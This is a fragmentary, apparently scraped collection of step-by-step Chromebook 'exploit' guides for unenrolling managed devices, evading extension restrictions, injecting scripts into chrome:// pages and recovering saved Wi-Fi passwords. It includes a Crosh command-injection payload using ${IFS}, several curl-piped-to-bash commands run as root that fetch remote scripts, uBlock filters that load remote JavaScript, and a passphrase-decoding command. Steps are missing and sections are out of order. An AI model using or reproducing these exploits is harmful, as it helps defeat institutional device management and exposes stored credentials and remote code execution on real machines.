7: Run the command "vpd -i RW_VPD -s check_enrollment=0", then press Ctrl+Alt+F1.
8: Once you're done, reboot your computer with Power+Refresh, then reunenroll.
Only works on Chrome OS v135-7
Unenrolls your Chromebook, removing ALL restrictions.
Created by the crosbreaker team.
Chrome OS-based exploit.
sh1ttyOOBE.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number doesn't end in 5, your Chromebook is unsupported.
3: Powerwash your Chromebook, then on the "Welcome to your Chromebook" screen wait until you see the "Quick set up with Android" button. Do not click "Get Started" if it doesn't show immediately.
4: Press Ctrl+Shift+R & click "Cancel".
5: Click "Enter your google account email & password" & it should say to "Connect to a network".
6: Open quick settings & connect to a network.
7: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Other:
A: After signing in you can sign out, which will return you to the welcome screen. From here, proceed with OOBE & sign in with the same email, then when you sign in it will hang on the "Please wait" screen.
Afterwards, simply restart or press Alt+Volume Up+X to return to the lockscreen. This will persist until the next powerwash.
B: After gaining persistence via the above instruction, you can simply boot modified recovery images in unverified Recovery Mode.
Afterwards, you can also perform BadBr0ker & BadSH1MMER.
Requires a storage device, Dev Mode; patched on keyrolled devices
Allows you to boot Linux or Chrome OS from an external storage device without modifying your Chromebook.
Use Appleboot on keyrolled devices.
Chrome OS-based exploit.
Shimboot.mp4
1: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
2: Get your Chromebook’s RMA shim from chrome100.dev & run the commands below or download a prebuilt one from here.
3: Flash it onto an external storage device.
4: Enable Dev Mode & then plug in the storage device & reenter Recovery Mode (Esc+Refresh+Power).
5: Boot into Linux & log in. The default is user/user.
6: Expand the rootfs partition so that it fills up the entire disk by running "sudo growpart /dev/sdX 4" (replacing sdX with the block device corresponding to your disk) to expand the partition, then run "sudo resize2fs /dev/sdX4" to expand the filesystem.
1: Get code execution in an extension. This extension will need to have the "tabs", "activeTab", & "browserAction" permissions as well as 'unsafe-eval' set in the CSP.
2: Enable the flag "#extensions-on-chrome-urls".
3: Get a bookmarklet & place it as follows: chrome.browserAction.onClicked.addListener(() => {chrome.tabs.executeScript(null, {code: `location.href="javascript:bookmarklet";`});});
4: Open the URL you want this code to run on & click the extension icon.
Requires extension Developer Mode
An extension that allows you to download other extensions.
Web-based exploit.
Skebstore.mp4
1: Download the folder from the GitHub page or here.
2: Go to chrome://extensions & enable extension Developer Mode.
3: Click "Load unpacked" & select the folder (unzip it if needed).
4: Click the extension to go to the Skebstore install page.
5: Insert an extension's ID & download it.
2: Enable the Snap&Read toolbar.
3: Enter any text into the outline topic's editable text area.
4: Click the bullet point of the topic.
5: Click the "Link to Source" option.
6: Click the "+" button at the bottom right.
7: Switch to the website tab.
8: In the Article/Page title input field, enter the name of your chosen bookmarklet.
9: Click "Save" & switch to the outline tab.
10: In the Snap&Read toolbar, click the "Hide Outlines" button.
Execution:
11: In the Snap&Read toolbar, click the "Show Outlines" button.
12: In your created outline, click the link separated by parentheses that contains the bookmarklet.
13: Click the "Hide Outlines" button.
Requires the ability to view a page’s source code
Reconstructs a web page from its source code.
Web-based "exploit".
1: Go to a website & view its source code with Ctrl+U or by using the View Source bookmarklet.
2: Copy everything from the newly opened tab & paste it in a site like this.
Requires a CAUB'd Wi-Fi network
Find the Wi-Fi password for CAUB'd Wi-Fi networks.
Web-based exploit.
SIPE.mp4
1: CAUB the Wi-Fi network you want to get the password from.
2: Go here & type the name of the Wi-Fi network.
3: Click the majik (TM) button; it will tell you what you'll need to press in step 6.
4: Go to chrome://sync-internals/ in a new tab & click the "Search" tab.
5: Type "Wi-Fi_" in the textbox & click "Search".
6: Click the name of the Wi-Fi you got from step 3 & copy all the data. Note that it might be a longer string than what it says on SIPE.
7: Go back to SIPE & paste the data in the textbox, then click the majik button (TM).
Requires Sh0vel, Extension Dev Mode, Crosh; patched on Chrome OS 127+
Run scripts in Chrome pages.
Web-based exploit.
1: Enter a kiosk profile with SKIOVOX.
2: Download the ZIP from here.
3: Navigate to chrome://extensions & enable Extension Dev Mode, then load the extension.
4: Navigate to chrome-untrusted://crosh & run "vmc create-extra-disk --size=1 /home/chronos/user/MyFiles/Downloads/opener.txt". It should return "A raw disk is created at /home/chronos/user/MyFiles/Downloads/opener.txt."
5: Open a new tab. If the default New Tab page loads, install the SKIOVOX Helper extension in a new tab before proceeding.
6: Click the folder icon in the bottom right. The file manager should open. Navigate to "Downloads".
7: Open the opener.txt file. A new window should open with a blank page tab. This window is managed by your organization.
8: Open a new tab & close the blank page tab.
9: Navigate to chrome://extensions & open the details page of the extension you previously chose to install in your managed profile. Copy its extension ID.
10: Return to the regular window that is not managed by your organization.
11: Activate the Skiovox Breakout extension.
12: In the input field for the extension ID, enter the ID of the extension you previously chose to install in your managed profile.
13: Set the textarea text to the script you want to run.
14: Click Start injection.
Loading the Tr3nch Menu:
1: Navigate to chrome://flags & enable the "extensions-on-chrome-urls" flag.
2: Click "Restart" then navigate to chrome://os-settings, chrome://settings, chrome://extensions, chrome://chrome-signin, chrome://inspect, chrome://file-manager, chrome://network, or chrome://oobe.
3: Click the extensions icon in the toolbar.
4: Click & activate the extension with the injected script. The Tr3nch menu should launch.
uBlock Origin exclusive
Unblocks bookmarklets. Older version of uRun.
Web-based exploit.
1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find "userResourcesLocation unset" & change it from "unset" to "https://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js".
3: Go to the “My filters” tab & add a line with “*##+js(execute_script.js)”, then run the code on the current page (Ctrl+Alt+~).
Requires Dev Mode, external storage device
Allows you to boot from an external storage device. See Shimboot for booting Linux from an external storage device.
USBoot.mp4
1: Enable Dev Mode (Esc+Power+Refresh).
2: After selecting "boot from internal disk", press Ctrl+Alt+F2.
3: Run "sudo crossystem dev_boot_usb=1". Note that if the GBB flag that ignores this is set you can skip this step.
Press "Ctrl+U" on the OS Verification screen to boot from the external storage.
uBlock Origin exclusive
Unblocks bookmarklets. Updated version of uBlock Run.
Web-based exploit.
uRun.mp4
1: Go to uBlock Origin’s settings page & check the “I am an advanced user” box, then click on the small cog icon.
2: Find "userResourcesLocation unset" & change it to "https://inglan2.github.io/uRun/urun.js".
3: Go to the “My filters” tab & add a line with “*##+js(urun.js)”, then run the code on the current page (Ctrl+Alt+~).
Press "Ctrl+Shift+`" to open the menu, where you can run & create scripts. To add a script, click the ➕ button & enter the code without the "javascript:" part.
Requires Dev Mode
Gives you the password to a Wi-Fi network.
1: Enter Dev Mode & open Crosh (Ctrl+Alt+T).
2: Run the commands "shell", "sudo su", & "cd home/root", then type "ls" & copy the middle code string.
3: Run the command "cd [code string here]" & type "ls" again.
4: Enter "more shill/shill.profile".
5: Eventually, you’ll see a username appear. Scroll up in Crosh until you see the SSID (network ID). Copy the passphrase code (below the SSID & after the colon).
6: Run the command "echo [passphrase] | tr '!-~' 'P-~!-O'".
Patched on Chrome OS 101+
Unenrolls your Chromebook using Crosh.
Unenroll:
1: Open Crosh (Ctrl+Alt+T).
2: Run "set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'"
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R).
4: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Re-enroll:
1: Open a bash shell & run "sudo -i", "vpd -i RW_VPD -s check_enrollment=1", "echo "fast safe" > /mnt/stateful_partition/factory_install_reset", & "reboot".
Requires Dev Mode; patched on version 117+
Allows you to have Dev Mode permissions while in Safe Mode. Succeeded by Murkmod.
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the kernver text ends in 4+, your Chromebook is unsupported.
4: Enter Dev Mode.
5: Go to chrome-untrusted://crosh & run the commands "shell", “sudo -i”, & “bash <(curl -SLk https://github.com/MercuryWorkshop/fakemurk/releases/latest/download/fakemurk.sh)”. Follow everything it says. If you get an error about a filesystem being readonly, run “fsck -f $(rootdev)” & reboot.
If you get stuck on the enrollment screen, enter Dev Mode with Ctrl+D, then press Refresh+Power & then space on the OS Verification screen. You will be on a “Chrome OS is missing or damaged” screen. Enter Dev Mode & when you get back to the OS verification screen press Ctrl+D to boot.
Don't use the sign out button as it will freeze your computer. Use Power+Refresh or Reboot in Crosh instead.
Mush will be installed with Fakemurk.
While Fakemurk is installed, you can make a folder called “disable-extensions” to disable extensions.
1: Open Crosh (Ctrl+Alt+T) & run the “vmc” command. If you get a list of subcommands, then continue.
2: Powerwash then sign in & disable Wi-Fi immediately.
3: Go to chrome://extensions & enable your internet, then immediately disable it when an extension is installed.
4: Open Crosh & for each extension you want to disable, run the command “vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extensionID}” or run “vmc create-extra-disk --size 1 /home/chronos/user/Extensions” to disable all.
5: Reenable Wi-Fi.
Requires Dev Mode; patched on Chrome OS 131+
Changes your Chromebook's policy.
Chrome OS-based exploit.
1: Enter Dev Mode (Esc+Power+Refresh) & open Crosh (Ctrl+Alt+T).
2: Run the following commands: “shell”, “sudo su”, & “curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash”.
A: If the policy doesn’t apply, press Alt+Vol Up+X.
3: Reboot, repeat steps 1 & 2, then run this command: "curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash".